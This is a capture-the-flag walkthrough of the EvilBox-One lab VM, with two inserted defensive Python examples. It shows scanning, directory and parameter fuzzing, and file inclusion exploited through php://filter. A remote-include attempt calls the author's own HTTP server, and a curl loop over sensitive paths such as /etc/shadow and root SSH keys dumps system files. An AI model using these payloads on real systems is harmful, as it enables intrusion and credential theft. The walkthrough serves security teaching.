Target machine: EvilBox---One

Preparation

Walkthrough

Finding the target

Using the usual tools:

  • arp-scan
  • nmap
  • netdiscover
  • fping

For initial discovery, use sudo arp-scan -l -I eth1; the other scanners each have limitations of one kind or another, and nmap is better suited to further scanning once a target has been pinned down

Interface: eth1, type: EN10MB, MAC: 08:00:27:5f:50:d7, IPv4: 192.168.56.116
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:0d       (Unknown: locally administered)
192.168.56.100  08:00:27:15:0f:e5       PCS Systemtechnik GmbH
192.168.56.117  08:00:27:4d:bc:dd       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 2.140 seconds (119.63 hosts/sec). 3 responded
  • 192.168.56.1 and 192.168.56.100 are the gateway and the DHCP server address respectively
  • The target is 192.168.56.117

Run a standard nmap scan: nmap -A -T4 192.168.56.117

Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-09 09:41 CST
Nmap scan report for 192.168.56.117
Host is up (0.0012s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 4495500be473a18511ca10ec1ccbd426 (RSA)
|   256 27db6ac73a9c5a0e47ba8d81ebd6d63c (ECDSA)
|_  256 e30756a92563d4ce3901c19ad9fede64 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.77 seconds
  • Port 22 confirmed open, running OpenSSH 7.9p1

  • Port 80 confirmed open, running Apache 2.4.38

  • The OS is Linux (Debian)

  • SSH is set aside for now

    • no password and no key
    • no intelligence whatsoever
  • Decide to start with HTTP on port 80: even if it cannot be breached, it may yield information useful for an SSH brute-force

Web attack

First browse to http://192.168.56.117:80/ in Firefox for an initial look

  • It is only the Apache2 Debian default page, with essentially nothing usable

Use a web content-discovery tool to enumerate hidden pages on this site; the following tools are recommended

  • dirsearch
  • dirb
  • dirbuster
  • gobuster
  • feroxbuster
  • ffuf
  • wfuzz

We use dirsearch --url='192.168.56.117:80/'

┌──(kali㉿kali)-[~]
└─$ dirsearch --url='192.168.56.117:80/'

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/kali/.dirsearch/reports/80-_22-11-09_09-52-49.txt

Error Log: /home/kali/.dirsearch/logs/errors-22-11-09_09-52-49.log

Target: http://192.168.56.117:80/

[09:52:49] Starting: 
[09:52:52] 403 -  279B  - /.ht_wsr.txt                                     
[09:52:52] 403 -  279B  - /.htaccess.bak1                                  
[09:52:52] 403 -  279B  - /.htaccess.sample
[09:52:52] 403 -  279B  - /.htaccess.save
[09:52:52] 403 -  279B  - /.htaccess_extra
[09:52:52] 403 -  279B  - /.htaccess_orig
[09:52:52] 403 -  279B  - /.htaccess_sc
[09:52:52] 403 -  279B  - /.htaccess.orig                                  
[09:52:52] 403 -  279B  - /.htaccessOLD
[09:52:52] 403 -  279B  - /.htaccessOLD2
[09:52:52] 403 -  279B  - /.htpasswds
[09:52:52] 403 -  279B  - /.html
[09:52:52] 403 -  279B  - /.htm                                            
[09:52:52] 403 -  279B  - /.htpasswd_test                                  
[09:52:52] 403 -  279B  - /.httr-oauth
[09:52:52] 403 -  279B  - /.htaccessBAK
[09:52:54] 403 -  279B  - /.php                                            
[09:53:51] 200 -   10KB - /index.html                                       
[09:54:23] 200 -   12B  - /robots.txt                                       
[09:54:25] 200 -    4B  - /secret/                                          
[09:54:25] 301 -  317B  - /secret  ->  http://192.168.56.117/secret/        
[09:54:25] 403 -  279B  - /server-status                                    
[09:54:25] 403 -  279B  - /server-status/
  • /index.html is clearly the Apache2 Debian default page seen earlier, of no value

  • /robots.txt usually refers to the robots protocol and is of some value

    • The robots protocol, also called the crawler protocol or crawler rules, means a site can create a robots.txt file to tell search engines which pages may be crawled and which may not; a search engine reads robots.txt to decide whether a page may be crawled
    • But the robots protocol is not a firewall and has no enforcement power; a search engine can ignore robots.txt entirely and crawl snapshots of the pages anyway
  • /secret is a directory that may need further exploration

Let's first look at http://192.168.56.117:80/robots.txt to see what it contains

  • It holds one line: Hello H4x0r

    • Background: H4x0r stands for Hacker; it is a piece of l33t speak jargon in which H4x0r means Hacker
    • This is probably a taunt aimed at intruders and of little value, but a password or username might be related to H4x0r, so we note it for now
  • A robots.txt with near-empty content like this mainly serves to keep crawlers away

What remains of value is the /secret directory, so let's run a second round of web content discovery with dirsearch --url='192.168.56.117:80/secret'

  • dirsearch returns nothing; we can try another wordlist with the command dirsearch --url='192.168.56.117:80/secret' --wordlists=/usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -e txt,php,html,jsp

    • --wordlists= specifies the wordlist
    • seclists is a wordlist collection for Kali; if it is missing it can be installed directly on Kali
    • -e specifies the file extensions to search for
    • Brute-forcing may be very slow. If the Kali VM has been given enough cores and memory there is nothing to worry about; if its resources are limited, use gobuster instead: gobuster dir --url='192.168.56.117:80/secret' -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp. After all, everyone knows how fast dirsearch is in Python, whereas gobuster is written in Go and runs at close to C speed
┌──(kali㉿kali)-[~]
└─$ gobuster dir --url='192.168.56.117:80/secret' -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.117:80/secret
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              txt,php,html,jsp
[+] Timeout:                 10s
===============================================================
2022/11/09 19:35:29 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 4]
/evil.php             (Status: 200) [Size: 0]ec
Progress: 708415 / 708545 (99.98%)===============================================================
2022/11/09 19:42:23 Finished
===============================================================
  • For web directory brute-forcing the tool is not the key point; the key point is the choice of wordlist
  • The result, /evil.php, is our new lead

We try to visit /evil.php and find nothing, not even in the page source. We can guess that this page is a script, probably one that processes data; if so there must be a request parameter for the data to go through. Our next step is parameter fuzzing

Here we use ffuf

  • For the parameter wordlist we use Kali's classic seclists

  • Our own value wordlist: var.txt

    0
    1
    a
    '
    "
    (
    [
    {
    <
    ,
    ;
    ?
    `
    /
    \
    %
    ture
    false
    ../robots.txt
    H4x0r
    

    Construction rationale: plausible guesses [values that trigger vulnerabilities, generally applicable content, files known to exist, gathered information]

    • Numeric type: 0, 1 represent a number or a boolean, the classic probe
    • Letter: a represents a single letter, string or word
    • Unbalanced brackets and quotes: ', ", (, [, {, <
    • Special characters: , ; ? ` / \ %
    • Boolean forms: ture, false
    • File-inclusion type: ../robots.txt, an internal file we know exists, whose content is simple and easy to recognise in a response
    • Gathered information: H4x0r
  • Build the ffuf command ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:params -w ./var.txt:var -u http://192.168.56.117/secret/evil.php?params=var -fs 0

    • -w specifies a wordlist; the combined format is wordlist path:wordlist alias
    • -u specifies the URL to fuzz
    • -fs filters on HTTP response body size; here responses of size 0 are dropped
┌──(kali㉿kali)-[~/workspace]
└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:params -w ./var.txt:var -u http://192.168.56.117/secret/evil.php?params=var -fs 0

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.56.117/secret/evil.php?params=var
 :: Wordlist         : params: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
 :: Wordlist         : var: ./var.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 0
________________________________________________

[Status: 200, Size: 12, Words: 2, Lines: 2, Duration: 50ms]
    * params: command
    * var: ../robots.txt

:: Progress: [109701/109701] :: Job [1/1] :: 1599 req/sec :: Duration: [0:02:00] :: Errors: 0 ::
  • The result shows the parameter is command
  • The value ../robots.txt shows that /evil.php performs file inclusion
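As an added illustration from the defender's side (not part of the original write-up), the following Python script scans Apache access-log lines for the kind of include probes this fuzzing run produces: query values that carry a URL scheme or PHP wrapper, a .. traversal segment, an absolute path, or a NUL byte, and then counts probes per client. The log lines are constructed samples modelled on the requests in this write-up; the Finding type, the regular expressions and the function names are my own.

```python
import re
from collections import Counter
from dataclasses import dataclass
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample in Apache "combined" format, modelled on the requests made
# in this write-up: a harmless fuzz value, a traversal probe, a php:// wrapper,
# a remote URL and an absolute path from the attacking host, then one benign hit.
SAMPLE_LOG = """\
192.168.56.116 - - [09/Nov/2022:19:50:01 +0800] "GET /secret/evil.php?id=0 HTTP/1.1" 200 0 "-" "fuzzer"
192.168.56.116 - - [09/Nov/2022:19:50:01 +0800] "GET /secret/evil.php?command=../robots.txt HTTP/1.1" 200 12 "-" "fuzzer"
192.168.56.116 - - [09/Nov/2022:19:55:12 +0800] "GET /secret/evil.php?command=php://filter/read=convert.base64-encode/resource=./evil.php HTTP/1.1" 200 92 "-" "curl"
192.168.56.116 - - [09/Nov/2022:19:56:30 +0800] "GET /secret/evil.php?command=http://192.168.56.116:80/var.txt HTTP/1.1" 200 0 "-" "curl"
192.168.56.116 - - [09/Nov/2022:19:58:03 +0800] "GET /secret/evil.php?command=/etc/passwd HTTP/1.1" 200 1423 "-" "curl"
192.168.56.1 - - [09/Nov/2022:20:01:44 +0800] "GET /index.html HTTP/1.1" 200 10701 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# A leading scheme such as php:, data:, expect:, http: marks a wrapper or remote file.
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.\-]*:', re.I)


@dataclass(frozen=True)
class Finding:
    ip: str
    path: str
    param: str
    value: str
    reason: str


def classify_value(raw):
    """Return why a query value looks like a file-inclusion probe, or None."""
    value = unquote(raw)  # parse_qsl decoded once; undo a second (double) encoding
    if '\x00' in value:
        return 'null-byte'
    if SCHEME_RE.match(value):
        return 'url-or-wrapper'
    if '..' in value.replace('\\', '/').split('/'):
        return 'path-traversal'
    if value.startswith('/'):
        return 'absolute-path'
    return None


def scan_log(text):
    """Parse access-log lines and report every suspicious query parameter."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash
        parts = urlsplit(m.group('target'))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            reason = classify_value(value)
            if reason:
                findings.append(Finding(m.group('ip'), parts.path, name, unquote(value), reason))
    return findings


def offenders(findings):
    """Probe count per client, so the noisiest source stands out."""
    return Counter(f.ip for f in findings)


if __name__ == '__main__':
    results = scan_log(SAMPLE_LOG)
    for f in results:
        print(f'{f.ip} {f.path} {f.param}={f.value!r} -> {f.reason}')
    print(dict(offenders(results)))
```

On the sample above only the four include probes are reported (the plain id=0 fuzz value and the index.html request are not), all attributed to 192.168.56.116; fed a real access.log the same functions give a quick triage of which client was probing which parameter.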

We build a request to test /evil.php further: http://192.168.56.117/secret/evil.php?command=../robots.txt. Opening it in Firefox and viewing the source, the returned content is "pure", no different from /robots.txt, so we can conclude that the inclusion returns the file directly. Anyone who has learned PHP knows about PHP file-inclusion vulnerabilities, and we can start from there

  • Check whether the include supports remote files; if it does, a webshell can be included for direct access

    ┌──(kali㉿kali)-[~/workspace]
    └─$ ls                                                              
    var.txt
                                                                        
    ┌──(kali㉿kali)-[~/workspace]
    └─$ python3 -m http.server 80
    Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
    
    -- divider --
    ┌──(kali㉿kali)-[~]
    └─$ curl "http://192.168.56.117/secret/evil.php?command=http://192.168.56.116:80/var.txt"
    
    
    • Remote inclusion is not supported
  • Can PHP's built-in URL-style wrappers be used? If so, a webshell could be written and used for access

    ┌──(kali㉿kali)-[~/workspace]
    └─$ curl "http://192.168.56.117/secret/evil.php?command=php://filter/read=convert.base64-encode/resource=../robots.txt"                   3 ⨯
    SGVsbG8gSDR4MHIK
    
    ┌──(kali㉿kali)-[~]
    └─$ curl "http://192.168.56.117/secret/evil.php?command=php://filter/write/resource=../robots.txt&txt=1"
    Hello H4x0r
    
    ┌──(kali㉿kali)-[~]
    └─$ curl "http://192.168.56.117/secret/evil.php?command=php://filter/read=convert.base64-encode/resource=./evil.php" | base64 --decode   1 ⨯
    % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                    Dload  Upload   Total   Spent    Left  Speed
    100    92  100    92    0     0   8532      0 --:--:-- --:--:-- --:--:--  9200
    <?php
        $filename = $_GET['command'];
        include($filename);
    ?>
    
    
    • php:// can be used to read from the various I/O streams
    • but data cannot be written
    • By reading it base64-encoded we can peek at the content of evil.php and find it is just a simple file include
    <?php
        $filename = $_GET['command'];
        include($filename);
    ?>
    
  • Check whether the include can read sensitive system files directly; keep gathering information to find a way in

    • The usual candidates are /etc/passwd, /etc/shadow, /etc/sudoers, */.ssh/authorized_keys ...

    Build the wordlist file.txt

    /apache/apache/conf/httpd.conf
    /apache/apache2/conf/httpd.conf
    /apache/php/php.ini
    /bin/php.ini
    /etc/anacrontab
    /etc/apache/apache.conf
    /etc/apache/httpd.conf
    /etc/apache2/apache.conf
    /etc/apache2/httpd.conf
    /etc/apache2/sites-available/default
    /etc/apache2/vhosts.d/00_default_vhost.conf
    /etc/at.allow
    /etc/at.deny
    /etc/cron.allow
    /etc/cron.deny
    /etc/crontab
    /etc/fstab
    /etc/host.conf
    /etc/httpd/conf.d/httpd.conf
    /etc/httpd/conf.d/php.conf
    /etc/httpd/conf/httpd.conf
    /etc/httpd/htdocs/index.html
    /etc/httpd/htdocs/index.php
    /etc/httpd/logs/access.log
    /etc/httpd/logs/access_log
    /etc/httpd/logs/error.log
    /etc/httpd/logs/error_log
    /etc/httpd/php.ini
    /etc/init.d/httpd
    /etc/init.d/mysql
    /etc/ld.so.conf
    /etc/motd
    /etc/my.cnf
    /etc/mysql/my.cnf
    /etc/mysql/my.cnf
    /etc/network/interfaces
    /etc/networks
    /etc/passwd
    /etc/php.ini
    /etc/php/apache/php.ini
    /etc/php/apache2/php.ini
    /etc/php/cgi/php.ini
    /etc/php/php.ini
    /etc/php/php4/php.ini
    /etc/php4.4/fcgi/php.ini
    /etc/php4/apache/php.ini
    /etc/php4/apache2/php.ini
    /etc/php4/cgi/php.ini
    /etc/php5/apache/php.ini
    /etc/php5/apache2/php.ini
    /etc/php5/cgi/php.ini
    /etc/phpmyadmin/config.inc.php
    /etc/resolv.conf
    /etc/shadow
    /etc/ssh/sshd_config
    /etc/ssh/ssh_config
    /etc/ssh/ssh_host_dsa_key
    /etc/ssh/ssh_host_dsa_key
    /etc/ssh/ssh_host_dsa_key.pub
    /etc/ssh/ssh_host_dsa_key.pub
    /etc/ssh/ssh_host_key
    /etc/ssh/ssh_host_key
    /etc/ssh/ssh_host_key.pub
    /etc/ssh/ssh_host_key.pub
    /etc/ssh/ssh_host_rsa_key
    /etc/ssh/ssh_host_rsa_key
    /etc/ssh/ssh_host_rsa_key.pub
    /etc/ssh/ssh_host_rsa_key.pub
    /etc/sysconfig/network
    /etc/sysconfig/network
    /home/apache/conf/httpd.conf
    /home/apache2/conf/httpd.conf
    /home/bin/stable/apache/php.ini
    /home2/bin/stable/apache/php.ini
    /NetServer/bin/stable/apache/php.ini
    /opt/www/conf/httpd.conf
    /opt/www/htdocs/index.html
    /opt/www/htdocs/index.php
    /opt/xampp/etc/php.ini
    /PHP/php.ini
    /php/php.ini
    /php4/php.ini
    /php5/php.ini
    /root/.atftp_history
    /root/.bashrc
    /root/.bash_history
    /root/.mysql_history
    /root/.nano_history
    /root/.php_history
    /root/.profile
    /root/.ssh/authorized_keys
    /root/.ssh/identity
    /root/.ssh/identity.pub
    /root/.ssh/id_dsa
    /root/.ssh/id_dsa.pub
    /root/.ssh/id_rsa
    /root/.ssh/id_rsa.pub
    /root/anaconda-ks.cfg
    /tmp/apache/htdocs/index.html
    /tmp/apache/htdocs/index.php
    /usr/lib/php.ini
    /usr/lib/php/php.ini
    /usr/local/apache/conf/httpd.conf
    /usr/local/apache/conf/php.ini
    /usr/local/apache/htdocs/index.html
    /usr/local/apache/htdocs/index.php
    /usr/local/apache/logs/access.log
    /usr/local/apache/logs/access_log
    /usr/local/apache/logs/access_logaccess_log.old
    /usr/local/apache/logs/error.log
    /usr/local/apache/logs/error_log
    /usr/local/apache/logs/error_logerror_log.old
    /usr/local/apache2/conf/httpd.conf
    /usr/local/apache2/conf/php.ini
    /usr/local/apache2/htdocs/index.html
    /usr/local/apache2/htdocs/index.php
    /usr/local/cpanel/logs
    /usr/local/cpanel/logs/access_log
    /usr/local/cpanel/logs/error_log
    /usr/local/cpanel/logs/license_log
    /usr/local/cpanel/logs/login_log
    /usr/local/cpanel/logs/stats_log
    /usr/local/cpanel/logs/stats_log
    /usr/local/etc/php.ini
    /usr/local/httpd/conf/httpd.conf
    /usr/local/httpd2.2/htdocs/index.html
    /usr/local/httpd2.2/htdocs/index.php
    /usr/local/lib/php.ini
    /usr/local/mysql/bin/mysql
    /usr/local/mysql/my.cnf
    /usr/local/php/lib/php.ini
    /usr/local/php4/lib/php.ini
    /usr/local/php4/lib/php.ini
    /usr/local/php4/php.ini
    /usr/local/php5/etc/php.ini
    /usr/local/php5/lib/php.ini
    /usr/local/php5/php5.ini
    /usr/local/share/examples/php/php.ini
    /usr/local/share/examples/php4/php.ini
    /usr/local/tomcat5527/bin/version.sh
    /usr/local/Zend/etc/php.ini
    /usr/share/tomcat6/bin/startup.sh
    /usr/tomcat6/bin/startup.sh
    /var/apache2/config.inc
    /var/httpd/conf/httpd.conf
    /var/httpd/conf/php.ini
    /var/httpd/conf/php.ini
    /var/httpd/htdocs/index.html
    /var/httpd/htdocs/index.php
    /var/lib/mysql/my.cnf
    /var/lib/mysql/mysql/user.MYD
    /var/local/www/conf/httpd.conf
    /var/local/www/conf/php.ini
    /var/log/access.log
    /var/log/access_log
    /var/log/apache/access.log
    /var/log/apache/access_log
    /var/log/apache/error.log
    /var/log/apache/error_log
    /var/log/apache2/access.log
    /var/log/apache2/access_log
    /var/log/apache2/error.log
    /var/log/apache2/error_log
    /var/log/error.log
    /var/log/error_log
    /var/log/mysql.log
    /var/log/mysql/mysql-bin.log
    /var/log/mysql/mysql-slow.log
    /var/log/mysql/mysql.log
    /var/log/mysqlderror.log
    /var/mail/root
    /var/mysql.log
    /var/spool/cron/crontabs/root
    /var/spool/mail/root
    /var/www/conf/httpd.conf
    /var/www/htdocs/index.html
    /var/www/htdocs/index.php
    /var/www/index.html
    /var/www/index.php
    /var/www/logs/access.log
    /var/www/logs/access_log
    /var/www/logs/error.log
    /var/www/logs/error_log
    /web/conf/php.ini
    /www/conf/httpd.conf
    /www/htdocs/index.html
    /www/htdocs/index.php
    /www/php/php.ini
    /www/php4/php.ini
    /www/php5/php.ini
    /xampp/apache/bin/php.ini
    /xampp/apache/conf/httpd.conf
    root/.ssh/authorized_keys
    root/.ssh/identity
    root/.ssh/identity.pub
    root/.ssh/id_dsa
    root/.ssh/id_dsa.pub
    root/.ssh/id_rsa
    root/.ssh/id_rsa.pub
    

    The bash script for the brute-force

    for i in $(cat ./file.txt)
    do
        echo ">>>$i:"
        curl "http://192.168.56.117/secret/evil.php?command=$i"
    done
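The root cause shown in evil.php is include($_GET['command']) with no validation at all. As an added example, not from the write-up or the VM, here is the validation logic a fixed version would apply, written in Python so it can be run stand-alone: refuse any value containing a scheme separator (which covers php://, http:// and data: alike), resolve the candidate with realpath and require it to sit directly inside the page directory, and, where the set of pages is known, compare against a fixed allowlist. The temporary directory layout, the allowlist and the function names are my assumptions; in PHP the equivalent building blocks would be realpath(), basename() and in_array().

```python
import os
import tempfile


def resolve_include(base_dir, requested, allowed=None):
    """Map a user-controlled page name to a file under base_dir, or return None.

    Layers, cheapest first:
      1. reject empty values, NUL bytes and anything containing ':' (php://,
         data:, http:// and every other wrapper or remote URL share it);
      2. resolve with realpath and require the result to sit directly inside
         base_dir, which defeats ../ traversal, absolute paths and symlinks;
      3. if an allowlist is supplied, accept only those exact file names;
      4. only .php files that actually exist are ever returned.
    """
    if not requested or '\x00' in requested or ':' in requested:
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.dirname(candidate) != base:
        return None
    name = os.path.basename(candidate)
    if allowed is not None and name not in allowed:
        return None
    if not name.endswith('.php') or not os.path.isfile(candidate):
        return None
    return candidate


# Probe values taken from this write-up, plus a NUL-byte variant.
PROBES = [
    'index.php',
    './evil.php',
    '../robots.txt',
    '/etc/passwd',
    'php://filter/read=convert.base64-encode/resource=./evil.php',
    'http://192.168.56.116:80/var.txt',
    'index.php\x00.txt',
]


def demo():
    """Build a constructed web root (robots.txt beside a secret/ directory) and
    return, for each probe, whether it is accepted with and without an allowlist."""
    root = tempfile.mkdtemp()
    secret = os.path.join(root, 'secret')
    os.mkdir(secret)
    for rel in ('robots.txt', 'secret/index.php', 'secret/evil.php'):
        with open(os.path.join(root, rel), 'w') as fh:
            fh.write('constructed sample\n')
    return {
        'allowlist': {p: resolve_include(secret, p, allowed={'index.php'}) is not None for p in PROBES},
        'containment_only': {p: resolve_include(secret, p) is not None for p in PROBES},
    }


if __name__ == '__main__':
    for layer, results in demo().items():
        print(layer)
        for probe, ok in results.items():
            print('  ', 'accept' if ok else 'reject', repr(probe))
```

With the allowlist only index.php is accepted; with containment alone ./evil.php also passes, which is why an allowlist is preferable whenever the application knows its own page names. Every traversal, absolute-path, wrapper and remote-URL probe from the write-up is rejected by both layers.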
    

The results below have been processed: entries that were duplicates, returned nothing, or returned default content have been removed

┌──(kali㉿kali)-[~/workspace]
└─$ for i in $(cat ./file.txt)
for> do
for> echo ">>>$i:"
for> curl "http://192.168.56.117/secret/evil.php?command=$i"
for> done

>>>/etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin

>>>/etc/resolv.conf:
domain home
search home
nameserver 192.168.1.1

>>>/etc/ssh/sshd_config:
#       $OpenBSD: sshd_config,v 1.103 2018/04/09 20:41:22 tj Exp $

# This is the sshd server system-wide configuration file.  See
# sshd_config(5) for more information.

# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin

# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented.  Uncommented options override the
# default value.

#Port 22
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key

# Ciphers and keying
#RekeyLimit default none

# Logging
#SyslogFacility AUTH
#LogLevel INFO

# Authentication:

#LoginGraceTime 2m
#PermitRootLogin prohibit-password
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10

#PubkeyAuthentication yes

# Expect .ssh/authorized_keys2 to be disregarded by default in future.
#AuthorizedKeysFile     .ssh/authorized_keys .ssh/authorized_keys2

#AuthorizedPrincipalsFile none

#AuthorizedKeysCommand none
#AuthorizedKeysCommandUser nobody

# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# HostbasedAuthentication
#IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes

# To disable tunneled clear text passwords, change to no here!
#PasswordAuthentication yes
#PermitEmptyPasswords no

# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no

# Kerberos options
#KerberosAuthentication no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
#KerberosGetAFSToken no

# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes
#GSSAPIStrictAcceptorCheck yes
#GSSAPIKeyExchange no

# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication.  Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
UsePAM yes

#AllowAgentForwarding yes
#AllowTcpForwarding yes
#GatewayPorts no
X11Forwarding yes
#X11DisplayOffset 10
#X11UseLocalhost yes
#PermitTTY yes
PrintMotd no
PrintLastLog no
#TCPKeepAlive yes
#PermitUserEnvironment no
#Compression delayed
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS no
#PidFile /var/run/sshd.pid
#MaxStartups 10:30:100
#PermitTunnel no
#ChrootDirectory none
#VersionAddendum none

# no default banner path
#Banner none

# Allow client to pass locale environment variables
AcceptEnv LANG LC_*

# override default of no subsystems
Subsystem       sftp    /usr/lib/openssh/sftp-server

# Example of overriding settings on a per-user basis
#Match User anoncvs
#       X11Forwarding no
#       AllowTcpForwarding no
#       PermitTTY no
#       ForceCommand cvs server

>>>/etc/ssh/ssh_config:

# This is the ssh client system-wide configuration file.  See
# ssh_config(5) for more information.  This file provides defaults for
# users, and the values can be changed in per-user configuration files
# or on the command line.

# Configuration data is parsed as follows:
#  1. command line options
#  2. user-specific file
#  3. system-wide file
# Any configuration value is only changed the first time it is set.
# Thus, host-specific definitions should be at the beginning of the
# configuration file, and defaults at the end.

# Site-wide defaults for some commonly used options.  For a comprehensive
# list of available options, their meanings and defaults, please see the
# ssh_config(5) man page.

Host *
#   ForwardAgent no
#   ForwardX11 no
#   ForwardX11Trusted yes
#   PasswordAuthentication yes
#   HostbasedAuthentication no
#   GSSAPIAuthentication no
#   GSSAPIDelegateCredentials no
#   GSSAPIKeyExchange no
#   GSSAPITrustDNS no
#   BatchMode no
#   CheckHostIP yes
#   AddressFamily any
#   ConnectTimeout 0
#   StrictHostKeyChecking ask
#   IdentityFile ~/.ssh/id_rsa
#   IdentityFile ~/.ssh/id_dsa
#   IdentityFile ~/.ssh/id_ecdsa
#   IdentityFile ~/.ssh/id_ed25519
#   Port 22
#   Protocol 2
#   Ciphers aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,3des-cbc
#   MACs hmac-md5,hmac-sha1,umac-64@openssh.com
#   EscapeChar ~
#   Tunnel no
#   TunnelDevice any:any
#   PermitLocalCommand no
#   VisualHostKey no
#   ProxyCommand ssh -q -W %h:%p gateway.example.com
#   RekeyLimit 1G 1h
    SendEnv LANG LC_*
    HashKnownHosts yes
    GSSAPIAuthentication yes

>>>/etc/ssh/ssh_host_rsa_key.pub:
